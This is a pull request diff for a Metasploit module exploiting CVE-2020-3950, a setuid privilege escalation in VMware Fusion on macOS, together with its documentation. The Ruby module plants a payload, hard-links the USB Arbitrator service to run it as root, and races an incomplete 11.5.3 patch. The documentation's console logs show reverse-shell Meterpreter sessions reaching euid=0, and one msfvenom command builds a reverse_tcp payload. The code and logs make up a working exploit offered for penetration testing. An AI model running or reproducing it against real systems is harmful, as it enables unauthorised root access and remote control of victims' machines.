### PR TITLE
VMWare Fusion OSX priv esc CVE-2020-3950

### DIFF
--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -57,7 +57,7 @@ lport => 8888
 resource (fusion.rb)> exploit
 [+] Vmware Fusion 11.5.1 is exploitable
 [*] The target appears to be vulnerable.
-[*] Started reverse TCP handler on 1.1.1.1:8888 
+[*] Started reverse TCP handler on 1.1.1.1:8888
 [*] Sending stage (53755 bytes) to 2.2.2.2
 [*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49265) at 2020-03-23 18:07:57 -0400
 
@@ -80,7 +80,7 @@ session => 1
 resource (fusion.rb)> exploit
 
 [!] SESSION may not be compatible with this module.
-[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Started reverse TCP handler on 1.1.1.1:4444
 [+] Vmware Fusion 11.5.1 is exploitable
 [*] Using pre-11.5.3 exploit
 [*] Uploading Payload: /Users/h00die/Contents/Library/services/VMware USB Arbitrator Service
@@ -118,7 +118,7 @@ lhost => 1.1.1.1
 resource (fusion.rb)> set lport 8888
 lport => 8888
 resource (fusion.rb)> exploit
-[*] Started reverse TCP handler on 1.1.1.1:8888 
+[*] Started reverse TCP handler on 1.1.1.1:8888
 [*] Sending stage (53755 bytes) to 2.2.2.2
 [*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49198) at 2020-03-28 07:37:16 -0400
 
@@ -140,7 +140,7 @@ session => 1
 resource (fusion.rb)> exploit
 
 [!] SESSION may not be compatible with this module.
-[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Started reverse TCP handler on 1.1.1.1:4444
 [+] Vmware Fusion 11.5.3 is exploitable
 [*] Using 11.5.3 exploit
 [*] Uploading Payload to /Users/h00die/Contents/Library/services/SAGgama
@@ -150,7 +150,7 @@ resource (fusion.rb)> exploit
 [*] Writing '/Users/h00die/Contents/Library/services/alYnwGRyo' (178 bytes) ...
 [*] Launching Exploit /Users/h00die/Contents/Library/services/alYnwGRyo
 [*] attempt 1
-[*] Exploit Finished, killing 
+[*] Exploit Finished, killing
 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49213) at 2020-03-28 07:37:28 -0400
 [-] Unable to delete /Users/h00die/Contents/Library/services/VMware USB Arbitrator Service
 [+] Deleted /Users/h00die/Contents/Library/services/TVOK7bDP
@@ -167,5 +167,5 @@ OS           : macOS Unknown (macOS 10.15.3)
 Architecture : x86
 BuildTuple   : x86_64-apple-darwin
 Meterpreter  : x64/osx
-meterpreter > 
+meterpreter >
 ```

--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This exploits an improper use of setuid binaries within VMware Fusion 11 - 11.5.2. The `Open VMware USB Arbitrator Service` can be
+This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.2. The `Open VMware USB Arbitrator Service` can be
 launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home
 directory in a specific folder, and creating a hard link to the `Open VMware USB Arbitrator Service`, we're able to launch it
 temporarily to start our payload with an effective UID of 0.
@@ -10,7 +10,7 @@ Additional description can be found in
 
 It was found that VMware Fusion 11.5.3, which patched the previous vulnerability utilized an incomplete patch.  The patch checked
 for a correct code signature on the `VMware USB Arbitrator Service` at start, but not at launch, thus creating a TOCTOU race
-condition.  The discoverer @jeffball55 demoed the exploit working in 20 attempts.  This module has been successful between
+condition.  The discoverer @jeffball55 demoed the exploit working in ~30 attempts.  This module has been successful between
 5 and 25 attempts.
 
 VMware Fusion 11.5.1 is available from [VMware](https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg).
@@ -29,7 +29,7 @@ VMware Fusion 11.5.1 is available from [VMware](https://download3.vmware.com/sof
 
 ### MAXATTEMPTS
 
-The maximum attempts to start `VMware USB Arbitrator Service`, attempting to win the race against 11.5.3.  Default is `50`.
+The maximum attempts to start `VMware USB Arbitrator Service`, attempting to win the race against 11.5.3.  Default is `75`.
 
 ### Session
 

--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -1,14 +1,19 @@
 ## Vulnerable Application
 
-This exploits an improper use of setuid binaries within VMWare Fusion 11 - 11.5.2. The `Open VMware USB Arbitrator Service` can be
+This exploits an improper use of setuid binaries within VMware Fusion 11 - 11.5.2. The `Open VMware USB Arbitrator Service` can be
 launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home
-directory in a specific folder, and creating a hard link to the `Open VMWare USB Arbitrator Service`, we're able to launch it
+directory in a specific folder, and creating a hard link to the `Open VMware USB Arbitrator Service`, we're able to launch it
 temporarily to start our payload with an effective UID of 0.
 
 Additional description can be found in
 @mirchr's [exploit](https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh).
 
-VMWare Fusion 11.5.1 is available from [VMWare](https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg).
+It was found that VMware Fusion 11.5.3, which patched the previous vulnerability utilized an incomplete patch.  The patch checked
+for a correct code signature on the `VMware USB Arbitrator Service` at start, but not at launch, thus creating a TOCTOU race
+condition.  The discoverer @jeffball55 demoed the exploit working in 20 attempts.  This module has been successful between
+5 and 25 attempts.
+
+VMware Fusion 11.5.1 is available from [VMware](https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg).
 
 ## Verification Steps
 
@@ -21,6 +26,10 @@ VMWare Fusion 11.5.1 is available from [VMWare](https://download3.vmware.com/sof
   7. You should get a `euid=0` shell.
 
 ## Options
+
+### MAXATTEMPTS
+
+The maximum attempts to start `VMware USB Arbitrator Service`, attempting to win the race against 11.5.3.  Default is `50`.
 
 ### Session
 
@@ -72,8 +81,9 @@ resource (fusion.rb)> exploit
 
 [!] SESSION may not be compatible with this module.
 [*] Started reverse TCP handler on 1.1.1.1:4444 
-[+] 'Open VMware USB Arbitrator Service' binary detected
-[*] Uploading Payload
+[+] Vmware Fusion 11.5.1 is exploitable
+[*] Using pre-11.5.3 exploit
+[*] Uploading Payload: /Users/h00die/Contents/Library/services/VMware USB Arbitrator Service
 [*] Creating folder (/Users/h00die/2KLH/s0m/wX8XO/) and link
 [*] Starting USB Arbitrator Service (5 sec pause)
 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49269) at 2020-03-23 18:08:14 -0400
@@ -90,4 +100,72 @@ Architecture : x86
 BuildTuple   : x86_64-apple-darwin
 Meterpreter  : x64/osx
 
+```
+
+### VMWare Fusion 11.5.3 on macOS 10.15.3
+
+```
+```
+
+```
+resource (fusion.rb)> setg verbose true
+verbose => true
+resource (fusion.rb)> use exploit/multi/handler
+resource (fusion.rb)> set payload python/meterpreter/reverse_tcp
+payload => python/meterpreter/reverse_tcp
+resource (fusion.rb)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (fusion.rb)> set lport 8888
+lport => 8888
+resource (fusion.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:8888 
+[*] Sending stage (53755 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49198) at 2020-03-28 07:37:16 -0400
+
+meterpreter > getuid
+Server username: h00die
+meterpreter > sysinfo
+Computer        : h00dies-MBP.ragedomain
+OS              : Darwin 19.3.0 Darwin Kernel Version 19.3.0: Thu Jan  9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/osx
+meterpreter > background
+[*] Backgrounding session 1...
+```
+```
+resource (fusion.rb)> use exploit/osx/local/vmware_fusion_lpe
+resource (fusion.rb)> set session 1
+session => 1
+resource (fusion.rb)> exploit
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[+] Vmware Fusion 11.5.3 is exploitable
+[*] Using 11.5.3 exploit
+[*] Uploading Payload to /Users/h00die/Contents/Library/services/SAGgama
+[*] Uploading race condition executable.
+[*] Writing '/Users/h00die/Contents/Library/services/TVOK7bDP' (342 bytes) ...
+[*] Creating folder (/Users/h00die/weGd/JvR/VoYDt/) and link
+[*] Writing '/Users/h00die/Contents/Library/services/alYnwGRyo' (178 bytes) ...
+[*] Launching Exploit /Users/h00die/Contents/Library/services/alYnwGRyo
+[*] attempt 1
+[*] Exploit Finished, killing 
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49213) at 2020-03-28 07:37:28 -0400
+[-] Unable to delete /Users/h00die/Contents/Library/services/VMware USB Arbitrator Service
+[+] Deleted /Users/h00die/Contents/Library/services/TVOK7bDP
+[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_dir: Operation failed: Python exception: OSError
+[*] Exploit completed, but no session was created.
+msf5 exploit(osx/local/vmware_fusion_lpe) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: h00die @ h00dies-MBP.ragedomain (uid=501, gid=20, euid=0, egid=20)
+meterpreter > sysinfo
+Computer     : h00dies-MBP.ragedomain
+OS           : macOS Unknown (macOS 10.15.3)
+Architecture : x86
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+meterpreter > 
 ```

--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -46,6 +46,8 @@ lhost => 1.1.1.1
 resource (fusion.rb)> set lport 8888
 lport => 8888
 resource (fusion.rb)> exploit
+[+] Vmware Fusion 11.5.1 is exploitable
+[*] The target appears to be vulnerable.
 [*] Started reverse TCP handler on 1.1.1.1:8888 
 [*] Sending stage (53755 bytes) to 2.2.2.2
 [*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49265) at 2020-03-23 18:07:57 -0400

--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -1,13 +1,14 @@
 ## Vulnerable Application
 
-This exploits an improper use of setuid binaries within VMWare Fusion 11 - 11.5.2. The `Open VMware USB Arbitrator Service` can be 
-launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home 
-directory in a specific folder, and creating a hard link to the `Open VMWare USB Arbitrator Service`, we're able to launch it 
+This exploits an improper use of setuid binaries within VMWare Fusion 11 - 11.5.2. The `Open VMware USB Arbitrator Service` can be
+launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home
+directory in a specific folder, and creating a hard link to the `Open VMWare USB Arbitrator Service`, we're able to launch it
 temporarily to start our payload with an effective UID of 0.
 
-Additional description can be found in @mirchr's [exploit](https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh).
+Additional description can be found in
+@mirchr's [exploit](https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh).
 
-VMWare Fusion 11.5.1 is available from [VMWare](https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg)
+VMWare Fusion 11.5.1 is available from [VMWare](https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg).
 
 ## Verification Steps
 
@@ -18,7 +19,7 @@ VMWare Fusion 11.5.1 is available from [VMWare](https://download3.vmware.com/sof
   5. Do: ```set session #```
   6. Do: ```run```
   7. You should get a `euid=0` shell.
- 
+
 ## Options
 
 ### Session

--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -37,6 +37,55 @@ Which session to use this exploit on.
 
 ## Scenarios
 
+### VMware Fusion 10.1.6
+
+```
+msf5 exploit(osx/local/vmware_fusion_lpe) > run
+
+[!] SESSION may not be compatible with this module.
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[+] Vmware Fusion 10.1.6 is exploitable
+[*] Using pre-11.5.3 exploit
+[*] Uploading Payload: /Users/wvu/Contents/Library/services/VMware USB Arbitrator Service
+[*] Max line length is 131073
+[*] Writing 804084 bytes in 25 chunks of 111592 bytes (octal-encoded), using printf
+[*] Next chunk is 117552 bytes
+[*] Next chunk is 116480 bytes
+[*] Next chunk is 114764 bytes
+[*] Next chunk is 113263 bytes
+[*] Next chunk is 111420 bytes
+[*] Next chunk is 112649 bytes
+[*] Next chunk is 115231 bytes
+[*] Next chunk is 113278 bytes
+[*] Next chunk is 114696 bytes
+[*] Next chunk is 114109 bytes
+[*] Next chunk is 118500 bytes
+[*] Next chunk is 119288 bytes
+[*] Next chunk is 116736 bytes
+[*] Next chunk is 114000 bytes
+[*] Next chunk is 114444 bytes
+[*] Next chunk is 114460 bytes
+[*] Next chunk is 116528 bytes
+[*] Next chunk is 112788 bytes
+[*] Next chunk is 84713 bytes
+[*] Next chunk is 106180 bytes
+[*] Next chunk is 89744 bytes
+[*] Next chunk is 87533 bytes
+[*] Next chunk is 127271 bytes
+[*] Next chunk is 71468 bytes
+[*] Created folder (/Users/wvu/Bvr/k8h88/GAymi/) and link
+[*] Starting USB Service (5 sec pause)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:63876) at 2020-04-02 11:00:59 -0500
+[+] Deleted /Users/wvu/Contents/Library/services/VMware USB Arbitrator Service
+[*] Killing service
+[*] Deleting /Users/wvu/Bvr
+
+meterpreter > getuid
+Server username: wvu @ [redacted] (uid=[redacted], gid=[redacted], euid=0, egid=[redacted])
+meterpreter >
+```
+
 ### VMware Fusion 11.5.1 (15018442) on macOS 10.15.3 (19D76)
 
 ```
@@ -105,9 +154,6 @@ Meterpreter  : x64/osx
 ### VMWare Fusion 11.5.3 on macOS 10.15.3
 
 ```
-```
-
-```
 resource (fusion.rb)> setg verbose true
 verbose => true
 resource (fusion.rb)> use exploit/multi/handler
@@ -133,6 +179,7 @@ Meterpreter     : python/osx
 meterpreter > background
 [*] Backgrounding session 1...
 ```
+
 ```
 resource (fusion.rb)> use exploit/osx/local/vmware_fusion_lpe
 resource (fusion.rb)> set session 1

--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -1,0 +1,90 @@
+## Vulnerable Application
+
+This exploits an improper use of setuid binaries within VMWare Fusion 11 - 11.5.2. The `Open VMware USB Arbitrator Service` can be 
+launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home 
+directory in a specific folder, and creating a hard link to the `Open VMWare USB Arbitrator Service`, we're able to launch it 
+temporarily to start our payload with an effective UID of 0.
+
+Additional description can be found in @mirchr's [exploit](https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh).
+
+VMWare Fusion 11.5.1 is available from [VMWare](https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Get a shell
+  4. Do: ```use exploit/osx/local/vmware_fusion_lpe```
+  5. Do: ```set session #```
+  6. Do: ```run```
+  7. You should get a `euid=0` shell.
+ 
+## Options
+
+### Session
+
+Which session to use this exploit on.
+
+## Scenarios
+
+### VMware Fusion 11.5.1 (15018442) on macOS 10.15.3 (19D76)
+
+```
+/msfvenom --payload python/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=8888 -b "\x00" -o /var/www/html/meterp_8888.py
+```
+
+```
+[*] Processing fusion.rb for ERB directives.
+resource (fusion.rb)> setg verbose true
+verbose => true
+resource (fusion.rb)> use exploit/multi/handler
+resource (fusion.rb)> set payload python/meterpreter/reverse_tcp
+payload => python/meterpreter/reverse_tcp
+resource (fusion.rb)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (fusion.rb)> set lport 8888
+lport => 8888
+resource (fusion.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:8888 
+[*] Sending stage (53755 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49265) at 2020-03-23 18:07:57 -0400
+
+meterpreter > getuid
+Server username: h00die
+meterpreter > sysinfo
+Computer        : h00dies-MBP.doman
+OS              : Darwin 19.3.0 Darwin Kernel Version 19.3.0: Thu Jan  9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/osx
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+```
+resource (fusion.rb)> use exploit/osx/local/vmware_fusion_lpe
+resource (fusion.rb)> set session 1
+session => 1
+resource (fusion.rb)> exploit
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[+] 'Open VMware USB Arbitrator Service' binary detected
+[*] Uploading Payload
+[*] Creating folder (/Users/h00die/2KLH/s0m/wX8XO/) and link
+[*] Starting USB Arbitrator Service (5 sec pause)
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49269) at 2020-03-23 18:08:14 -0400
+[+] Deleted /Users/h00die/Contents/Library/services/VMware USB Arbitrator Service
+[*] Killing service
+[*] Deleting /Users/h00die/2KLH
+
+meterpreter > getuid
+Server username: h00die @ h00dies-MBP.domain (uid=501, gid=20, euid=0, egid=20)
+meterpreter > sysinfo
+Computer     : h00dies-MBP.domain
+OS           : macOS Unknown (macOS 10.15.3)
+Architecture : x86
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+
+```

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -74,7 +74,8 @@ class MetasploitModule < Msf::Exploit::Local
       print_bad "'#{usb_service}' binary missing"
       return CheckCode::Safe
     end
-    
+
+    # Thanks to @ddouhine on github for this answer!    
     version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
     /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
     version = Gem::Version.new(version)

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -35,8 +35,8 @@ class MetasploitModule < Msf::Exploit::Local
             'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
             'grimm'
           ],
-        'Platform'       => [ 'osx', 'python' ],
-        'Arch'           => [ ARCH_X86, ARCH_X64, ARCH_PYTHON ],
+        'Platform'       => [ 'osx' ],
+        'Arch'           => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes'   => [ 'shell', 'meterpreter' ],
         'Targets'        => [[ 'Auto', {} ]],
         'Privileged'     => true,
@@ -51,8 +51,6 @@ class MetasploitModule < Msf::Exploit::Local
         'DisclosureDate' => "Mar 17 2020",
         'DefaultOptions' =>
           {
-            #'PrependSetuid'  => true,
-            #'PrependFork'    => true,
             'PAYLOAD'        => 'osx/x64/meterpreter_reverse_tcp',
             'WfsDelay'       => 15
           }

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -75,13 +75,13 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe
     end
 
-    # Thanks to @ddouhine on github for this answer!    
+    # Thanks to @ddouhine on github for this answer!
     version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
     /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
     version = Gem::Version.new(version)
     if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
       vprint_good "Vmware Fusion #{version} is exploitable"
-    else    
+    else
       print_bad "VMware Fusion #{version} is NOT exploitable"
       return CheckCode::Safe
     end

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -15,16 +15,16 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        'Name'           => 'VMware Fusion USB Arbitrator Setuid Priv Esc',
+        'Name'           => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
         'Description'    => %q(
-            This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
-            The Open VMware USB Arbitrator Service can be launched outide of its standard path
-            which allows loading of an attacker controlled binary.  By creating a payload in the
-            user home directory in a specific folder, and creating a hard link to the 'Open VMware
-            USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
-            with an effective UID of 0.
-            @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race.
-            Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
+          This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
+          The Open VMware USB Arbitrator Service can be launched outide of its standard path
+          which allows loading of an attacker controlled binary.  By creating a payload in the
+          user home directory in a specific folder, and creating a hard link to the 'Open VMware
+          USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
+          with an effective UID of 0.
+          @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race.
+          Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -171,7 +171,8 @@ class MetasploitModule < Msf::Exploit::Local
     register_file_for_cleanup runner_name
 
     print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
-    results = cmd_exec "#{runner_name} &"
+    # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
+    results = cmd_exec "#{runner_name} & :"
     Rex.sleep 15 # give time for the service to execute our payload
     vprint_status results
 

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Local
     root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
     link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
     print_status "Creating folder (#{link_folder}) and link"
-    
+
     cmd_exec "mkdir -p #{link_folder}"
     cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{link_folder}/#{usb_service}'"
     # register_file_for_cleanup "#{link_folder}/#{usb_service}" # this is handled later in rm_rf

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -1,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::OSX::Priv
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'VMWare Fusion USB Arbitrator Setuid Priv Esc',
+        'Description'    => %q(
+            This exploits an improper use of setuid binaries within VMWare Fusion 11 - 11.5.2.
+            The Open VMware USB Arbitrator Service can be launched outide of its standard path
+            which allows loading of an attacker controlled binary.  By creating a payload in the
+            user home directory in a specific folder, and creating a hard link to the 'Open VMWare
+            USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
+            with an effective UID of 0.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # msf module
+            'Dhanesh Kizhakkinan', # discovery
+            'Rich Mirch' # edb module
+          ],
+        'Platform'       => [ 'osx' ],
+        'Arch'           => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'Targets'        => [[ 'Auto', {} ]],
+        'Privileged'     => true,
+        'References'     =>
+          [
+            [ 'EDB', '48235' ],
+            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
+            [ 'CVE', '2020-3950' ]
+          ],
+        'DisclosureDate' => "Mar 17 2020",
+        'DefaultOptions' =>
+          {
+            'PrependSetuid'    => true,
+            'PAYLOAD'          => 'osx/x64/meterpreter_reverse_tcp',
+          }
+      )
+    )
+
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+    ]
+  end
+
+  def usb_service
+    'Open VMware USB Arbitrator Service'
+  end
+
+  def get_home_dir
+    cmd_exec 'echo ~'
+  end
+
+  def base_dir
+    "#{get_home_dir}/Contents/Library/services/"
+  end
+
+  def check
+    if exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
+      print_good "'#{usb_service}' binary detected"
+      return CheckCode::Appears
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    # First check the system is vulnerable, or the user wants to run regardless
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    # Check if we're already root
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      end
+    end
+
+    # Make sure we can write our payload to the remote system
+    rm_rf base_dir # live dangerously.
+    cmd_exec "mkdir -p #{base_dir}"
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Upload payload executable & chmod
+    print_status 'Uploading Payload'
+    write_file "#{base_dir}VMware USB Arbitrator Service", generate_payload_exe
+    chmod "#{base_dir}VMware USB Arbitrator Service", 0755
+    register_file_for_cleanup "#{base_dir}VMware USB Arbitrator Service"
+
+    # create folder structure and hard link to the original binary
+    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
+    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
+    print_status "Creating folder (#{link_folder}) and link"
+    
+    cmd_exec "mkdir -p #{link_folder}"
+    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{link_folder}/#{usb_service}'"
+    # register_file_for_cleanup "#{link_folder}/#{usb_service}" # this is handled later in rm_rf
+
+    print_status 'Starting USB Arbitrator Service (5 sec pause)'
+    cmd_exec "cd #{link_folder}; '#{link_folder}/#{usb_service}' &"
+    Rex.sleep 5 # give time for the service to execute our payload
+    print_status 'Killing service'
+    cmd_exec "pkill '#{usb_service}'"
+    print_status "Deleting #{root_link_folder}"
+    rm_rf root_link_folder
+  end
+end

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -15,22 +15,24 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        'Name'           => 'VMWare Fusion USB Arbitrator Setuid Priv Esc',
+        'Name'           => 'VMware Fusion USB Arbitrator Setuid Priv Esc',
         'Description'    => %q(
-            This exploits an improper use of setuid binaries within VMWare Fusion 11 - 11.5.2.
+            This exploits an improper use of setuid binaries within VMware Fusion 11 - 11.5.3.
             The Open VMware USB Arbitrator Service can be launched outide of its standard path
             which allows loading of an attacker controlled binary.  By creating a payload in the
-            user home directory in a specific folder, and creating a hard link to the 'Open VMWare
+            user home directory in a specific folder, and creating a hard link to the 'Open VMware
             USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
             with an effective UID of 0.
-            Successfully tested against 11.5.1, and 11.5.2
+            @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race.
+            Successfully tested against 11.5.1, 11.5.2, and 11.5.3
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
             'h00die <mike@stcyrsecurity.com>', # msf module
             'Dhanesh Kizhakkinan', # discovery
-            'Rich Mirch' # edb module
+            'Rich Mirch', # edb module
+            'Jeff Ball' # 11.5.3 exploit
           ],
         'Platform'       => [ 'osx' ],
         'Arch'           => [ ARCH_X86, ARCH_X64 ],
@@ -41,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Local
           [
             [ 'EDB', '48235' ],
             [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
+            [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
             [ 'CVE', '2020-3950' ]
           ],
         'DisclosureDate' => "Mar 17 2020",
@@ -52,13 +55,21 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
 
+    register_options [
+      OptInt.new('MAXATTEMPTS', [true, "Maximum attempts to win race for 11.5.3", 50]),
+    ]
+
     register_advanced_options [
       OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
     ]
   end
 
-  def usb_service
+  def open_usb_service
     'Open VMware USB Arbitrator Service'
+  end
+
+  def usb_service
+    'VMware USB Arbitrator Service'
   end
 
   def get_home_dir
@@ -69,17 +80,95 @@ class MetasploitModule < Msf::Exploit::Local
     "#{get_home_dir}/Contents/Library/services/"
   end
 
-  def check
-    unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
-      print_bad "'#{usb_service}' binary missing"
-      return CheckCode::Safe
-    end
-
+  def get_version
     # Thanks to @ddouhine on github for this answer!
     version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
